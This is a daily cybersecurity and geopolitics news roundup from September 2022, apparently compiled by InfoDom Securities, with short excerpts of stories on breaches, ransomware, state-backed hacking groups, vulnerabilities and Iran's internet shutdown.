Saturday, Sept 24, 2022 // (IG): BB // Sponsor: Buy me a whiskey
N.Korea says it has never supplied weapons or ammunition to Russia
FROM THE MEDIA: North Korea on Thursday said it has never supplied weapons or ammunition to Russia and has no plans to do so, while warning the United States to "keep its mouth shut" and stop circulating rumours aimed at "tarnishing" the country's image. "Recently, the U.S. and other hostile forces talked about the 'violation of a resolution' of the UNSC, spreading a 'rumour of arms dealings' between the DPRK and Russia.
READ THE STORY: Yahoo
Undercover with Russia’s fake arms dealers
FROM THE MEDIA: Russian state TV claims Ukrainians are selling US-donated weapons on the dark web. The BBC investigated one such marketplace, spoke undercover to those apparently selling weapons, and gathered evidence that suggests the adverts for weapons are fake. "Ukrops [a derogatory Russian slang term used to refer to Ukrainians] are selling Javelins on the darknet.
READ THE STORY: BBC
Australia’s second-largest wireless carrier suffers major cyberattack
FROM THE MEDIA: Critical infrastructure systems, including telecom networks, frequently grapple with cyberthreats, as evidenced by a recent spate of attacks. The Los Angeles school district earlier this month was hit by a potentially disastrous ransomware attack, the implications of which are still playing out. T-Mobile continues to deal with the consequences of a 2021 cyberattack that exposed personal data of at least 76 million people.
READ THE STORY: CyberSecurity Dive
Hackers Take Over Microsoft Exchange Servers with OAuth Apps
FROM THE MEDIA: On September 23, 2022, it was stated in a Microsoft Security blog post that the attacker "threat actor launched credential stuffing attacks against high-risk accounts that didn’t have multi-factor authentication (MFA) enabled and leveraged the unsecured administrator accounts to gain initial access". By accessing the cloud tenant, the attacker was able to register a phony OAuth application with elevated permissions.
READ THE STORY: MUO // HackRead
Cyber mercenaries
FROM THE MEDIA: SentinelLabs yesterday published an update on the Void Balaur cyber mercenary group. The hack-for-hire operation, which has operated in the criminal-to-criminal market since 2016, has expanded its activities. "New targets include a wide variety of industries, often with particular business or political interests tied to Russia. It's not generally clear who the group's customers are, but SentinelLabs points to some indications that a Russian security service may be among them.
READ THE STORY: The Cyberwire
What We Know About The Grand Theft Auto VI Data Breach
FROM THE MEDIA: On September 18, a cyber threat actor named “teapotuberhacker” posted on GTAForums.com claiming to have hacked Rockstar Games, the creator of the popular and controversial Grand Theft Auto (GTA) series. In that post, which has since been deleted, teapotuberhacker claimed to have stolen source code for Rockstar’s extremely anticipated Grand Theft Auto VI as well as its predecessor GTA V, in addition to 90 videos of alpha footage.
READ THE STORY: Security Boulevard
UK Police arrests teen believed to be behind Uber, Rockstar hacks
FROM THE MEDIA: The City of London police announced on Twitter today the arrest of a British 17-year-old teen suspected of being involved in recent cyberattacks. In a short tweet shared by law enforcement, the teen was arrested in Oxfordshire as part of a hacking investigation supported by the UK's National Crime Agency. BleepingComputer has reached out to the NCA and City of London police to learn more about this investigation.
READ THE STORY: Bleeping Computer
Malicious NPM package discovered in supply chain attack
FROM THE MEDIA: A developer tool has become the lure for a new supply chain scam aimed at poisoning software packages and causing downstream havoc. Researchers with ReversingLabs said the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.
READ THE STORY: TechTarget
APT41 spear-phishing, supply chain campaigns target pharma, healthcare
FROM THE MEDIA: A new Department of Health and Human Services Cybersecurity Coordination Center alert warns the healthcare sector is continuing to be targeted by APT41, a Chinese state-sponsored threat actor group actively tracked by researchers since 2012. APT41 has a history of targeting the healthcare sector, as well as the pharmaceuticals and high-tech industries, among others. The group makes frequent use of spear-phishing, water holes, supply chain attacks, and backdoors to gain access to the network for learning insights into the specific industry and gathering data to inform future attacks.
READ THE STORY: SCMAG
New security vulnerability in Oracle Cloud Infrastructure discovered
FROM THE MEDIA: A new vulnerability in Oracle Cloud Infrastructure (OCI) could have allowed unauthorized access to cloud storage volumes of all users, thereby violating cloud isolation. The security flaw, discovered by secure cloud experts at Wiz in June and dubbed AttachMe, is now being discussed in a new advisory the company published this week. According to Wix, the vulnerability is one of the most severe cloud vulnerabilities reported since it could have impacted all OCI customers.
READ THE STORY: Security Magazine
Metador: a so-far unattributed threat actor
FROM THE MEDIA: SentinelLabs yesterday reported another threat actor that looks like the work of a nation-state. "Metador" is described as targeting "telecommunications, internet service providers, and universities in several countries in the Middle East and Africa." It's not known who Metador is, nor whom the group is working for, but they show a high degree of operational security and situational awareness of the environments in which they operate.
READ THE STORY: The Cyberwire
CISA adds Zoho Manage Engine vulnerability to KEV catalog
FROM THE MEDIA: Researchers at Nucleus Security on Friday posted a blog that explained how the Zoho ManageEngine vulnerability discovered earlier this month was elevated and uploaded to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) catalog. Ryan Cribelar, the vulnerability research engineer at Nucleus Security who posted the blog, said CISA uploaded CVE-2022-35405 on Thursday when the agency determined that there was enough evidence that the vulnerability actually was exploited in the wild.
READ THE STORY: SCMAG
Iran blocks Whatsapp, Instagram as citizens protest death of Mahsa Amini
FROM THE MEDIA: Iran is experiencing a near-total internet service disruption in the west and intermittent interruptions nationwide, with access to Instagram, Whatsapp and some mobile networks being blocked, says Netblocks. While Twitter and Facebook were banned in Iran years ago, Instagram and WhatsApp remained as one of the few accessible social media platforms in the country. That is, until Wednesday when the two apps were choked.
READ THE STORY: The Register
This dangerous Android spyware could affect millions of devices
FROM THE MEDIA: An updated version of the Banker Android(opens in new tab) spyware has been detetcted, stealing victim's banking details and possibly even money in some cases. According to cybersecurity researchers from Microsoft(opens in new tab), an unknown threat actor has initiated a smishing campaign (SMS phishing), through which it tries to trick people into downloading TrojanSpy:AndroidOS/Banker.O.
READ THE STORY: TechRadar
SEO poisoning campaign directs search engine visitors from multiple industries to JavaScript malware
FROM THE MEDIA: Researchers have discovered a high-effort search engine optimization (SEO) poisoning campaign that seems to be targeting employees from multiple industries and government sectors when they search for specific terms that are relevant to their work. Clicking on the malicious search results, which are artificially pushed higher in ranking, lead visitors to a known JavaScript malware downloader.
READ THE STORY: CSO
Quad Foreign Ministers’ Statement on Ransomware
FROM THE MEDIA: We, the Foreign Ministers of Australia, India, and Japan and the Secretary of State of the United States, met in New York on September 23, 2022. We reaffirm the Quad’s commitment to supporting Indo-Pacific countries’ advancement of a free and open Indo-Pacific, which is inclusive and rules-based. We are committed to an open, secure, stable, accessible, and peaceful cyberspace and support regional initiatives to enhance the capacity of countries to implement the UN Framework for Responsible State Behavior in Cyberspace.
READ THE STORY: DoS
New ransomware variants, tactics rattle financial industry
FROM THE MEDIA: Since its emergence on the popular cyber scene in 2016, ransomware has not only afflicted virtually every major industry — including financial services — but it has evolved in leaps in bounds in ways that have made it increasingly difficult to fend off or mitigate. At a basic level, ransomware uses malware to encroach on corporate systems to encrypt and lock up the company’s data and systems and demand payment to turn control back over to the company.
READ THE STORY: SCMAG
Colonial Pipeline ransomware group using new tactics to become more dangerous
FROM THE MEDIA: The ransomware known as Darkside gained a level of infamy in May of 2021 when it was used in a devastating attack against Colonial Pipeline, a company responsible for delivering oil and gas across the East Coast. Now the cybercriminals behind Darkside are using new ransomware with new tools and tactics that make them even more of a threat. In a report published Thursday, security firm Symantec detailed the latest activities and methods used by Coreid to victimize organizations with ransomware.
READ THE STORY: TechRepublic
Microsoft Issues Out-of-Band Patch for Flaw Allowing Lateral Movement, Ransomware Attacks
FROM THE MEDIA: The vulnerability is tracked as CVE-2022-37972 and it has been described by Microsoft as a medium-severity spoofing issue. The tech giant has credited Brandon Colley of Trimarc Security for reporting the flaw. In its advisory, Microsoft said there is no evidence of exploitation, but the vulnerability has been publicly disclosed.
READ THE STORY: Security Week
Accused Russian RSOCKS Botmaster Arrested, Requests Extradition to U.S.
FROM THE MEDIA: A 36-year-old Russian man recently identified by KrebsOnSecurity as the likely proprietor of the massive RSOCKS botnet has been arrested in Bulgaria at the request of U.S. authorities. At a court hearing in Bulgaria this month, the accused hacker requested and was granted extradition to the United States, reportedly telling the judge, “America is looking for me because I have enormous information and they need it.”
READ THE STORY: Security Boulevard
NSA and CISA: Here's how hackers are going after critical systems, and what you need to do about it
FROM THE MEDIA: The National Security Agency and the Cybersecurity and Infrastructure Security Agency have issued an advisory explaining how to thwart cyberattacks on operational technology (OT) and industrial control system (ICS) assets. The new joint advisory outlines what critical infrastructure operators should know about their opponents, citing recent cyberattacks on Ukraine's energy grid and the ransomware attack against a fuel distribution pipeline.
READ THE STORY: ZDNET
Israel Bolsters Digital Defense amid Iran Cyber Threat
FROM THE MEDIA: At the height of the pandemic just over two years ago, Iranian hackers struck several Israeli water facilities, in an unprecedented cyber attack on the country’s civilian infrastructure. They are believed to have hacked into pump-operating software after routing through American and European servers to try to conceal their identity. If the operation had not been detected, water supplies would have been severely disrupted and chemicals, including chlorine, raised to dangerously high levels.
READ THE STORY: Geopolitical Monitor
Sophos warns of new firewall RCE bug exploited in attacks
FROM THE MEDIA: Sophos warned today that a critical code injection security vulnerability in the company's Firewall product is being exploited in the wild. "Sophos has observed this vulnerability being used to target a small set of specific organizations, primarily in the South Asia region," the security software and hardware vendor warned. "We have informed each of these organizations directly. Sophos will provide further details as we continue to investigate."
READ THE STORY: Bleeping Computer
Portuguese President Says Had Personal Data Stolen During TAP Airline Hack
FROM THE MEDIA: Portuguese President Marcelo Rebelo de Sousa's personal data was hacked during the Ragnar Locker ransomware attack on his country's flagship airline TAP, according to his official message posted on Friday. Rebelo de Sousa said he immediately took precautions regarding his email address which was the only detail not generally known, since his full name, date of birth and address are all public knowledge.
READ THE STORY: Urdupoint
Scammers stole tens of millions since 2019 using online credit card scheme
FROM THE MEDIA: Researchers on Friday uncovered what they claim may be one of the largest fraudulent online credit card schemes active today. The bad actors duped payment providers to accept payments and then the scammers use fake credit card numbers purchased on the darkweb to receive fraudulent payments. In a blog post, ReasonLabs researchers said this widespread global credit card scam has been operating since 2019 and has amassed tens of millions of dollars in fraud from the stolen credit card numbers of tens of thousands of individuals.
READ THE STORY: SCMAG
A GRU campaign masquerades as Ukrainian telecommunications providers
FROM THE MEDIA: Recorded Future's Insikt Group reports that the GRU has established new infrastructure for cyberespionage against Ukrainian targets. The threat actor UAC-0113 (which CERT-UA thinks is probably associated with the GRU's Sandworm operation) is using dynamic DNS domains as it masquerades as telecommunications providers. It uses HTML smuggling to distribute Colibri Loader and the Warzone remote access Trojan (RAT). The objectives of the campaign remain unclear, but Recorded Future thinks it's a Russian combat support effort.
READ THE STORY: The Cyberwire
So you think cross-site scripting isn’t a big deal
FROM THE MEDIA: Cross-site scripting (XSS) vulnerabilities have always been the most numerous class of web application security issues. They are easy to introduce but much harder to find and remediate, which increases the risk of them making it into production code. This is reinforced by the misconception that web security is all about protecting the server, and since XSS can only affect the client, it is a low-risk vulnerability with limited impact. In reality, cross-site scripting can be (and is) used by cybercriminals as a stepping stone to more elaborate attacks targeted at end users.
READ THE STORY: Security Boulevard
Shanghai Cooperation Organization summit could herald an approaching cold war
FROM THE MEDIA: Formed in 2001, the Shanghai Cooperation Organization (SCO) is an economic and political partnership helmed by China and Russia, and at the SCO summit last week, several countries including Iran, Turkey, and Myanmar announced their plans to join the partnership. With two major authoritarian governments at the wheel, the SCO promotes political and infrastructural strategies to maintain a protectionist attitude toward trade and social control over the countries’ citizens, and, as MIT Technology Review explains, this includes the use of technology that supports what experts call “digital authoritarianism.”
READ THE STORY: The Cyberwire
U.S. arms control talks with Russia a 'challenge' after Ukraine: diplomat
FROM THE MEDIA: Resuming dialogue with Russia toward a new nuclear arms treaty would be a "challenge" amid Moscow's invasion of Ukraine, a senior U.S. State Department official says, while also noting little progress on proposed nuclear talks with China. Bonnie Jenkins, appointed in July 2021 as undersecretary for arms control and international security, spoke with Nikkei on Thursday. The Biden administration had opened a strategic stability dialogue with Moscow, looking toward a successor to the New Strategic Arms Reduction Treaty -- or New START -- now set to expire in 2026.
READ THE STORY: Nikkei Asia
The pandemic turned out to be a boon for public-private cybersecurity cooperation
FROM THE MEDIA: The security headaches created by the COVID pandemic are well known. A massive shift from in-office to remote work in the early months of 2020 resulted in huge dislocations for IT and security groups, extending already porous network “perimeters” to hundreds or thousands of employee home offices and VPN connections. Sophisticated cyber adversaries piled on, exploiting remote worker connections to gain a foothold inside corporate IT environments and wreak havoc. Case in point: the May, 2021 compromise of Colonial Pipeline, which resulted in the shut down of a pipeline that supplies petroleum to the U.S. East Coast.
READ THE STORY: Security Boulevard
Gootloader uses blogging and SEO poisoning to attract victims
FROM THE MEDIA: Deepwatch describes how Gootloader uses well-planned and targeted blogs (with translation services and suggested links) in a search-engine-optimization (SEO) poisoning campaign. The operators appear to be trawling for users interested in topics related to "government, legal, healthcare, real estate, and education." Geographically, many countries are targeted, but most attention seems to be paid to the Five Eyes: Australia, Canada, New Zealand, the United Kingdom, and the United States. The operation looks like one run on behalf of a nation-state intelligence service, but Deepwatch offers no attribution.
READ THE STORY: The Cyberwire
Items of interest
US to expand internet access to help Iranians evade state surveillance
FROM THE MEDIA: The US Treasury Department on Friday issued guidance expanding the range of internet services available to Iranians despite US sanctions on the country, amid protests around Iran after the death of a 22-year-old woman in custody. Officials said the move would help Iranians access tools that can be used to circumvent state surveillance and censorship, but would not entirely prevent Tehran from using communications tools to stifle dissent, as it did by cutting off internet access for most citizens on Wednesday.
READ THE STORY: The Guardian
Why Social Engineering is So Effective (Video)
FROM THE MEDIA: The fabric of social media is an ideal attack vector for influence campaigns, in which internet users and their thoughts get targeted. There are underlying reasons that certain social engineering techniques are so effective. These are often called the principles.
Hunting Down Incel Extremists (Video)
FROM THE MEDIA: Extreme far-right terrorism is increasing. Julia Ebner believes in order to deal with this threat, you have to fully understand the extremist groups. From neo-Nazis to ISIS hackers, Julia Ebner goes undercover online to some of the darkest corners of the internet.
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com